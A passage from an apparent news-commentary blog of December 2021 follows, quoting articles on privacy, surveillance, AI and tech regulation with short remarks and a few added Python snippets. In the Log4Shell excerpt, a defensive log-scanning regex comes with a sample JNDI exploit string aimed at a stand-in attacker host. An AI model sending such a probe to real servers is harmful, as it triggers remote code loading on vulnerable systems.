Saturday, December 18, 2021

Your employee’s favorite tool might not be acceptable.

https://www.upi.com/Top_News/US/2021/12/17/jpmorgan-chase-sec-fine-whatsapp/9161639750005/

SEC gives JPMorgan Chase record fine for using WhatsApp to conduct business

JPMorgan Chase has agreed to pay a $125 million penalty for allowing employees on Wall Street to use smartphone apps to get around federal record-keeping laws, regulators announced Friday.

The Securities and Exchange Commission said the violations occurred between 2018 and 2020, during which some JPMorgan employees used WhatsApp and personal email accounts to conduct official business.



Apparently everything I was taught was backwards!

https://hbr.org/2021/12/digital-transformation-changes-how-companies-create-value

Digital Transformation Changes How Companies Create Value

Digital transformation is about changing where value is created, and how your business model is structured. More and more, value creation comes from outside the firm, not inside, and from external partners rather than internal employees. The authors call this new production model an “inverted firm,” a change in organizational structure that affects not only the technology but also the managerial governance that attends it. Executives must understand and undertake partner relationship management, partner data management, partner product management, platform governance, and platform strategy. They must learn how to motivate people they don’t know to share ideas they don’t have.

The most obvious examples of this trend are the platform firms Google, Apple, Facebook, Amazon, and Microsoft. They have managed to achieve scale economies in revenues per employee that would put the hyperscalers of the 19th and early 20th centuries to shame. Facebook and Google do not author the posts or web pages they deliver. Apple, Microsoft, and Google do not write the vast majority of apps in their ecosystems. Alibaba and Amazon never purchase or make an even vaster number of the items they sell. Smaller firms, modeled on platforms, show this same pattern. Sampling from the Forbes Global 2000, platform firms compared to industry controls had much higher market values ($21,726 M vs. $8,243 M), much higher margins (21% vs. 12%), but only half the employees (9,872 vs. 19,000).
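The scale gap in those Forbes Global 2000 figures is easy to check with a little arithmetic. A quick sketch, using only the numbers quoted above:

```python
# Comparing platform firms vs. industry controls, using the figures
# quoted in the excerpt above (market value in $M, headcount).
platform = {"market_value_m": 21726, "margin": 0.21, "employees": 9872}
control = {"market_value_m": 8243, "margin": 0.12, "employees": 19000}

def value_per_employee(firm):
    """Market value divided by headcount, in $M per employee."""
    return firm["market_value_m"] / firm["employees"]

ratio = value_per_employee(platform) / value_per_employee(control)
print(f"Platform: ${value_per_employee(platform):.2f}M per employee")
print(f"Control:  ${value_per_employee(control):.2f}M per employee")
print(f"Ratio: {ratio:.1f}x")
```

On these figures, a platform firm carries roughly $2.2M of market value per employee versus about $0.43M for an industry control, a gap of about 5x.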



Perspective. No need for laws as long as my killer robot is better than your killer robot.

https://www.aljazeera.com/news/2021/12/18/un-talks-fail-to-open-negotiations-on-killer-robots

UN talks fail to open negotiations on ‘killer robots’

Sixty-eight states have called for a legal instrument at the UN while a number of NGOs have been battling the unregulated spread of such weapons and pushing for new regulations.

Austrian Foreign Minister Alexander Schallenberg and New Zealand’s Minister for Disarmament and Arms Control Phil Twyford have both called for the development of new international laws regulating autonomous weapons. The new government coalition agreements of Norway and Germany have promised to take action on this issue.


(Related)

https://www.theregister.com/2021/12/17/raf_shoots_down_drone_syria/

RAF shoots down 'terrorist drone' over US-owned special ops base in Syria

The RAF has scored its first air-to-air "kill" – where an aircraft downs an enemy aircraft – for almost 40 years after shooting down a drone over Syria.

The drone's type was not disclosed by the Ministry of Defence, which issued a press statement yesterday boasting of the Royal Air Force Typhoon FGR.4's victory.

"The engagement took place on 14 December when the drone activity was detected above the Al Tanf Coalition base in Syria," said the MoD. "RAF Typhoons conducting routine patrols in the area were tasked to investigate."

The Eurofighter Typhoon pilot used an ASRAAM missile to destroy the "small hostile drone." The MBDA-made heat-seeking missile is estimated to cost around £200,000 per unit.


Friday, December 17, 2021

Something to quote from…

https://www.pogowasright.org/notable-privacy-and-security-books-2021/

Notable Privacy and Security Books 2021

Looking for good books to gift or read over the holidays? Privacy scholar Dan Solove has compiled a helpful list of notable books on privacy and security from 2021.

Want even more recommendations from all years? Professors Paul Schwartz and Solove maintain a resource page on Nonfiction Privacy + Security Books.



Is any update useful without a federal privacy law?

https://www.pogowasright.org/federal-study-acknowledges-failures-in-police-surveillance-oversight/

Federal Study Acknowledges Failures in Police Surveillance Oversight

For years researchers have called out the Wiretap Report for being outdated and incomplete

There are major flaws in how the federal government monitors police surveillance of Americans, a new government report found, representing the first time the federal court system has acknowledged its own failure to track things like wiretaps and electronic surveillance.

A study, conducted by the Federal Judicial Center, the research branch of the judicial branch of the U.S. government, says the federal court system’s annual Wiretap Report—which compiles information on local and federal law enforcement interceptions of people’s communications—is riddled with inaccuracies. Reporting requirements, the study found, fail to incorporate new technologies, further leaving the public and lawmakers in the dark as to how police use devices like stingrays and how often they collect things like text messages and cellphone data.

Privacy and civil liberties advocates have long criticized the system for overseeing law enforcement surveillance, but never before has the judicial agency publicly acknowledged its own failings.

Every year, federal and state judges are required by law to report all the wiretap orders they approved to the Administrative Office of the U.S. Courts, and prosecutors are also required to report wiretap orders they requested. The office uses that data to send Congress the annual Wiretap Report, which helps inform decisions about law enforcement, surveillance, and data privacy issues.

For at least the last 15 years, legal experts, judges, and lawmakers have criticized the Wiretap Report for under-reporting the number of wiretap orders that are actually issued and for failing to keep up with modern technology and surveillance techniques.

Albert Gidari, a retired lawyer who served as the consulting director of privacy at the Stanford Center for Internet and Society, has long called out the Wiretap Report’s inaccuracies. He started in 2005 speaking out about the inefficacy of wiretaps at conferences, and then, in 2010, once companies started releasing transparency reports, he pointed out their inaccuracies. In 2017, Gidari published a blog post highlighting how the Wiretap Report under-reported law enforcement surveillance. He found that while the Wiretap Report identified 3,554 phone wiretaps in 2014, phone carriers that same year reported receiving 10,712 wiretap orders.

Gidari said that nothing has changed with the Wiretap Report since.

“It’s not the sexiest issue that faces the country, but it’s still a really important one, especially in a world where everything is collected,” Gidari said. “Our very privacy foundations are really at risk.”

He said the Judicial Center’s acknowledgment of these flaws was essential to taking steps toward fixing the problem.

Between 2019 and 2021, the center conducted a series of focus groups and surveys split into two groups: one of judiciary stakeholders such as prosecutors and judges, and the other of non-judiciary stakeholders such as academics, lawyers, civil rights groups, and congressional staff.

The study came after a 2017 letter from Sen. Ron Wyden, a Democrat from Oregon, directed the Judicial Conference, the policy-making body for the federal courts, to implement transparency reforms for electronic surveillance, including an update to the Wiretap Report’s methodology.

Wyden said he plans to introduce legislation that will require similar reports on other surveillance methods.

“The wiretap report is a relic from the last century that reports on surveillance of pagers and fax machines, instead of use of modern surveillance technology, like malware and stingrays,” Wyden said in an email to The Markup. “The courts deserve a lot of credit for taking on the process of updating the wiretap reports, but it is clear that Congress will also need to pass a new law requiring annual reports for other forms of surveillance, such as location tracking and demands for data stored in the cloud.”

While each focus group in the study had different concerns with the Wiretap Report, some common key issues surfaced. Both groups called for updates to the report to reflect surveillance on modern technology and for better enforcement against inaccuracies.

Outdated Technologies

The Wiretap Report became a legally required disclosure in 1968 with the Omnibus Crime Control and Safe Streets Act. At the time, the only devices wiretaps were really intended for were landline phones.

But now wiretaps are mostly conducted on cellphones, and often phone data is included. Prosecutors and judges in the study said they couldn’t accurately disclose their surveillance requests because the “technologies listed on the forms were not up to date,” according to the study.

While the Wiretap Report covers surveillance on phone calls, there’s no transparency on surveillance on phone data, device location, messaging through texts or messenger apps, or online voice calls.

It also doesn’t cover new methods of surveillance like geofence warrant requests or stingray devices that intercept phone data.

“That type of surveillance is not being entered in a wiretap report, and it probably couldn’t be under current legal authorities,” Stephen Wm. Smith, a retired federal magistrate judge and a former director of Fourth Amendment and Open Courts at Stanford’s Center for Internet and Society, said. “We need to update our other surveillance laws to require reporting on the same level as wiretap reporting.”

Both Gidari and Smith participated in the study as non-judiciary stakeholders.

Prosecutors and judges said because the technologies covered were outdated, there was confusion over what they needed to report to the Wiretap Report. They recommended adding new technologies like communications apps and VoIP apps to the report.

“All participants agreed that the statute (18 U.S.C. § 2519) is out of date with respect to modern communications technology, and that an update would resolve at least some of the confusion about what is to be reported and how,” the study said.

Inaccurate Reports

All participants in the study also said that the Wiretap Report was consistently inaccurate, even when it comes to more traditional wiretaps, raising further concerns that policymakers would make decisions based on flawed information.

Prosecutors and judges blamed a lack of standards for the inaccurate reports, noting that there is no central template to follow for these disclosures. For example, participants weren’t sure if there needed to be a new wiretap issued for each phone number or device added to an investigation or if only an extension for an existing wiretap order was necessary, according to the study.

State prosecutors also said that they lacked training on how to file reports. And the Administrative Office of the U.S. Courts has no way of requesting information or penalizing those who don’t adequately report it.

“There is no feedback from the Administrative Office concerning errors or omissions on the submitted forms. Without feedback, there is no accountability, and the errors and omissions are likely to persist,” the study said.

Watchdogs who have scrutinized the Wiretap Report over the years have repeatedly raised concerns that some jurisdictions simply do not disclose their wiretaps, even when legally required to do so.

Smith, for example, found that many major cities had fewer wiretaps reported than small communities. He also found some of them just didn’t report at all.

“They weren’t doing any wiretaps in Dallas? I mean, come on,” he said. He recommended that the Administrative Office call out the cities and states that were failing to report each year.

The study also noted that many participants weren’t aware that the Administrative Office doesn’t have enforcement capabilities.

“Learning about the states that absolutely refused to report, that was new to us,” Gidari said. “It never occurred to me that the AO didn’t have the ability to pick up the phone and call a recalcitrant prosecutor and the chief judge of the district and say, ‘You’re not reporting. This is a law.’”

Because of this lack of enforcement capabilities, participants in the study recommended that Congress take action, calling for legislative changes that would give the Administrative Office enforcement powers or the ability to impose penalties for failure to report.

“The more Congress becomes aware of this, the more likely it is that something will happen,” Smith said.

This article was originally published on The Markup and was republished under the Creative Commons Attribution-NonCommercial-NoDerivatives license.



I doubt they will switch to an ‘opt in’ strategy, so what will they do? Perhaps they will search databases owned by governments?

https://www.theverge.com/2021/12/16/22840179/france-cnil-clearview-ai-facial-recognition-privacy-gdpr

French regulator tells Clearview AI to delete its facial recognition data

France’s foremost privacy regulator has ordered Clearview AI to delete all its data relating to French citizens, as first reported by TechCrunch.

In its announcement, the French agency CNIL argued that Clearview had violated the GDPR in collecting the data and violated various other data access rights in its processing and storage. As a result, CNIL is calling on Clearview to purge the data from its systems or face escalating fines as laid out by European privacy law.



Figuring out AI.

https://www.quantamagazine.org/what-does-it-mean-for-ai-to-understand-20211216/

What Does It Mean for AI to Understand?

Remember IBM’s Watson, the AI Jeopardy! champion? A 2010 promotion proclaimed, “Watson understands natural language with all its ambiguity and complexity.” However, as we saw when Watson subsequently failed spectacularly in its quest to “revolutionize medicine with artificial intelligence,” a veneer of linguistic facility is not the same as actually comprehending human language.

Natural language understanding has long been a major goal of AI research. At first, researchers tried to manually program everything a machine would need to make sense of news stories, fiction or anything else humans might write. This approach, as Watson showed, was futile — it’s impossible to write down all the unwritten facts, rules and assumptions required for understanding text. More recently, a new paradigm has been established: Instead of building in explicit knowledge, we let machines learn to understand language on their own, simply by ingesting vast amounts of written text and learning to predict words. The result is what researchers call a language model. When based on large neural networks, like OpenAI’s GPT-3, such models can generate uncannily humanlike prose (and poetry!) and seemingly perform sophisticated linguistic reasoning.
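The “learning to predict words” objective is simple to illustrate. The toy sketch below uses plain bigram counts on a made-up corpus, which is nothing like GPT-3’s large neural network internally, but it shows the same training signal: given a word, predict what tends to follow it in the text the model has seen.

```python
from collections import Counter, defaultdict

# Toy illustration of the "learn to predict the next word" objective.
# Real language models like GPT-3 use large neural networks over vast
# corpora; this bigram counter only demonstrates the idea of learning
# word statistics from raw text.
corpus = "the cat sat on the mat and the cat slept".split()

following = defaultdict(Counter)
for word, nxt in zip(corpus, corpus[1:]):
    following[word][nxt] += 1  # count how often `nxt` follows `word`

def predict_next(word):
    """Return the most frequent continuation seen in the corpus."""
    counts = following[word]
    return counts.most_common(1)[0][0] if counts else None

print(predict_next("the"))  # "cat" follows "the" twice, "mat" once
```

A model like this produces fluent-looking local continuations without anything resembling comprehension, which is the article’s point about linguistic facility versus understanding.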


Monday, December 13, 2021

Today we use the pandemic to justify it. The technology can also track political dissidents.

https://www.reuters.com/world/asia-pacific/skorea-test-ai-powered-facial-recognition-track-covid-19-cases-2021-12-13/

S.Korea to test AI-powered facial recognition to track COVID-19 cases

South Korea will soon roll out a pilot project to use artificial intelligence, facial recognition and thousands of CCTV cameras to track the movement of people infected with the coronavirus, despite concerns about the invasion of privacy.

The nationally funded project in Bucheon, one of the country's most densely populated cities on the outskirts of Seoul, is due to become operational in January, a city official told Reuters.

The system uses AI algorithms and facial recognition technology to analyse footage gathered by more than 10,820 CCTV cameras and track an infected person’s movements, anyone they had close contact with, and whether they were wearing a mask, according to a 110-page business plan from the city submitted to the Ministry of Science and ICT (Information and Communications Technology), and provided to Reuters by a parliamentary lawmaker critical of the project.



The value of people who make bad choices?

https://insight.kellogg.northwestern.edu/article/podcast-why-you-need-a-working-knowledge-of-ai

Podcast: Why You Need a Working Knowledge of AI

What do Watermelon Oreos and Cheetos lip balm have in common? A customer you don’t want.

Using artificial intelligence, marketing professor Eric Anderson and a team of researchers learned that fans of these ultimately doomed products were “harbingers of failure,” in that they tended to really like items that were later discontinued. The fine print for businesses: you don’t want your product to be in their shopping carts.

Note: The Insightful Leader is produced for the ear and not meant to be read as a transcript. We encourage you to listen to the audio version above. However, a transcript of this episode is available here. https://insight.kellogg.northwestern.edu/content/uploads/Eric-Anderson-AI-podcast-transcription.pdf



What happens if the UK says no?

https://www.reuters.com/world/uk/uk-antitrust-regulator-looks-into-microsofts-16-bln-nuance-deal-2021-12-13/

UK antitrust regulator looks into Microsoft's $16 bln Nuance deal

The Competition and Markets Authority (CMA), which has been stepping up its regulation of Big Tech, said it was considering whether the deal would result in reduced competition in the UK market.

Microsoft announced it would buy Nuance in April to boost its presence in cloud services for healthcare. The deal has already received regulatory approval in the United States and Australia, without remedies given.



Some minor changes to economic thought in the age of AI.

https://www.ft.com/content/d1bfa6d4-cee9-49db-9f79-eaf5ebfebf76

Health tech industry learns true value of medical data

In a medical artificial intelligence business, the quality of your algorithms — and therefore the value of your company — depends on your access to data. In this, the health tech sector is in some ways similar to advertising and internet search industries: it has quickly learnt that data is immensely valuable.

… Some 20 US healthcare systems recently formed a data company called Truveta, raising $200m to capitalise on the value of their combined patient records. In 2018, pharmaceutical company Roche valued US cancer patient data at almost $2bn, through its acquisition of Flatiron Health.

Hospitals and diagnostic labs are a rich source of this kind of health data for AI developers. Their databases of images and medical records are fodder for machine learning algorithms. These healthcare facilities typically seek patient consent for use of their data via a blanket “research use” provision that is a condition for using the medical service.


(Related)

https://www.inc.com/kevin-j-ryan/artificial-intelligence-social-justice-responsibility-microsoft-mary-gray-neurips.html

A Microsoft Researcher on the Power (and Perils) of Building AI

Harvard anthropologist Mary Gray explains why some of the biggest problems can arise in the earliest stages.

Relying on artificial intelligence in your business comes with some serious responsibilities. Just ask Mary Gray, a Harvard anthropologist and senior principal researcher at Microsoft Research who this week stressed the importance of collecting data mindfully when building AI--and how failing to do so can result in social injustices. Gray was speaking at the Conference on Neural Information Processing Systems about the relationship between AI and social justice.

"Data," she cautioned to the online audience, "is power."


Sunday, December 12, 2021

Basil Blume pointed this one out. (How could I have missed it?)

https://www.denverpost.com/2021/12/10/log4shell-cybersecurity-critical-software-flaw/

“The internet’s on fire” as techs race to fix critical software flaw

A cybersecurity firm CEO called the Log4Shell bug “the single biggest, most critical vulnerability of the last decade”

The flaw may be the worst computer vulnerability discovered in years. It was uncovered in an open-source logging tool that is ubiquitous in cloud servers and enterprise software used across industry and government. Unless it is fixed, it grants criminals, spies and programming novices alike easy access to internal networks where they can loot valuable data, plant malware, erase crucial information and much more.

“I’d be hard-pressed to think of a company that’s not at risk,” said Joe Sullivan, chief security officer for Cloudflare, whose online infrastructure protects websites from malicious actors. Untold millions of servers have it installed, and experts said the fallout would not be known for several days.
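Log4Shell (CVE-2021-44228) is triggered when attacker-controlled text containing a JNDI lookup, e.g. `${jndi:ldap://...}`, reaches a vulnerable Log4j logger. As a rough illustration only, the sketch below scans captured log data for that telltale pattern; it is a first-pass heuristic, not a defense, since obfuscated variants evade simple matching and actual remediation means patching Log4j itself.

```python
import re

# Heuristic scan for the classic Log4Shell probe string in log data.
# Covers the protocols commonly seen in exploitation attempts; note
# that obfuscated payloads (e.g. nested ${lower:...} lookups) will
# slip past a simple regex like this.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def suspicious_lines(log_lines):
    """Return the lines that contain a plain JNDI lookup string."""
    return [line for line in log_lines if JNDI_PATTERN.search(line)]

logs = [
    "GET /index.html 200",
    "User-Agent: ${jndi:ldap://attacker.example/x}",  # classic probe
]
print(suspicious_lines(logs))
```

The hostname `attacker.example` is a placeholder; in real attacks the URL points at a server the attacker controls, which is what makes the bug remote code execution rather than a mere logging quirk.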



An article to start my lawyer friends drooling…

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3976653

Ways That “Bad AI” Will Produce A Lawyering Goldmine Of Sorts

Though many have generally assumed that AI would be used for the benefit of mankind, the reality is that lots of bad (improper, illegal, etc.) uses are appearing with increasing frequency. Sometimes the bad AI is released by accident, while in other cases it is AI purposely devised for bad purposes. All in all, some are predicting a veritable goldmine of legal cases for attorneys specializing in the “Bad AI” realm, who will be seeking to defend clients accused of such AI miscreant efforts.



Crying fowl?

https://scholarlycommons.law.northwestern.edu/njtip/vol19/iss1/4/

Ostrich with Its Head in the Sand: The Law, Inventorship, & Artificial Intelligence

As artificial intelligence (AI) systems’ capabilities advance, the law has struggled to keep pace. Nowhere is this more evident than in patent law’s refusal to recognize AI as an inventor. This is precisely what happened when, in 2020, the U.S. Patent and Trademark Office (USPTO) ruled that it will not accept an AI system as a named inventor on a patent.

This note explores the untenable legal fiction that the USPTO’s ruling has created. First, it explores the current state of AI systems, focusing on those capable of invention. Next, it examines patent law’s inventorship doctrine and the USPTO’s application of that doctrine to AI inventors. The note then explains that disallowing AI systems as inventors does not map well onto patent law’s most common justifications. Finally, the note recommends a solution that maximizes patent law’s incentive structure: AI systems should be allowed as named inventors when patent ownership has been pre-contracted away to a natural person. If patent ownership has not been pre-contracted, the idea should enter the public domain and be unpatentable.



Perspective.

https://screenrant.com/web30-internet-explained-metaverse-blockchain/

What Is Web 3.0 And Could It Really Change The Internet Forever?

As the name implies, there have been two versions of internet computing, each progressively adding more internet services that open up new digital doorways. Web 1.0 was the initial phase of the world wide web that showcased information, but it was limited in ability, clunky to maneuver, and didn't offer many ways to monetize content. Web 2.0 enhanced its predecessor by sorting information on websites (thank you, Google!), allowing information to flow freely from site owner to user, and introducing tools for users to generate content. Many people are now calling for a new generation of the web to tackle the flaws they see in the current one.

Web 3.0 is being promoted heavily because content creators are outraged that only a few large corporations own most of the websites, and they want a way to take the power back. Newsfeeds are riddled with narratives that large social media entities like Twitter reap all the rewards from content generation. Technocrats are calling for a new edition of the web built on the blockchain, which would ideally make content creators the owners of their content and allow them to monetize it accordingly. Rather than a company receiving royalties off of content, Web 3.0 would allot each content creator a token on the blockchain every time a user accessed their content, and those tokens would accrue tangible monetary value.
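The per-access token accrual described above can be reduced to very simple accounting. The sketch below is a hypothetical, in-memory illustration only; a real Web 3.0 implementation would involve wallets, consensus, and smart contracts on an actual blockchain, none of which are modeled here.

```python
# Hypothetical, in-memory illustration of the "one token per content
# access" idea. A real web3 version would live in a smart contract;
# this only demonstrates the accounting concept.
class TokenLedger:
    def __init__(self):
        self.balances = {}

    def record_access(self, creator, tokens=1):
        """Credit a creator each time a user accesses their content."""
        self.balances[creator] = self.balances.get(creator, 0) + tokens

ledger = TokenLedger()
for _ in range(3):
    ledger.record_access("alice")  # alice's content viewed 3 times
ledger.record_access("bob")        # bob's content viewed once
print(ledger.balances)  # {'alice': 3, 'bob': 1}
```

The creator names are placeholders; the point is that value accrues directly to whoever produced the content rather than to the platform hosting it.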